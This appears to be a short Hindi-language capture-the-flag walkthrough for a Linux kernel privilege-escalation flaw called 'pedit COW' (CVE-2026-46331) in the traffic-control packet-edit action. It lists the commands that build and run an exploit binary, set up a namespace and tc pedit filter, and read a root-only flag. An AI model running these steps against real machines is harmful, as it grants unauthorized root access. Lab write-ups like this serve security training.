
pedit COW भेद्यता (CVE-2026-46331) के लिए विवरण और शोषण के कदम
pedit COW भेद्यता (CVE-2026-46331) के लिए विवरण और शोषण चरण।
यह चुनौती pedit COW को प्रदर्शित करती है, जो ट्रैफ़िक-नियंत्रण उपतंत्र के पैकेट-संपादन क्रिया (act_pedit) में एक Linux कर्नेल दोष है। यह भेद्यता एक अनाधिकृत उपयोगकर्ता को setuid-root बाइनरी की मेमोरी में प्रतिलिपि को अधिलेखित करने की अनुमति देती है, जिससे वह डिस्क पर फ़ाइल को छुए बिना प्रभावी रूप से एक रूट शेल प्राप्त कर लेता है।
वातावरण एक अनाधिकृत उपयोगकर्ता (karen) के रूप में शुरू होता है।
id
cd ~/packet_edit_meme
make packet_edit_meme
unshare -r -n
tc qdisc del dev lo clsact
tc qdisc add dev lo clsact
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
exit
./packet_edit_meme
# cat /root/flag.txt
THM{YOUR_FLAG_HERE}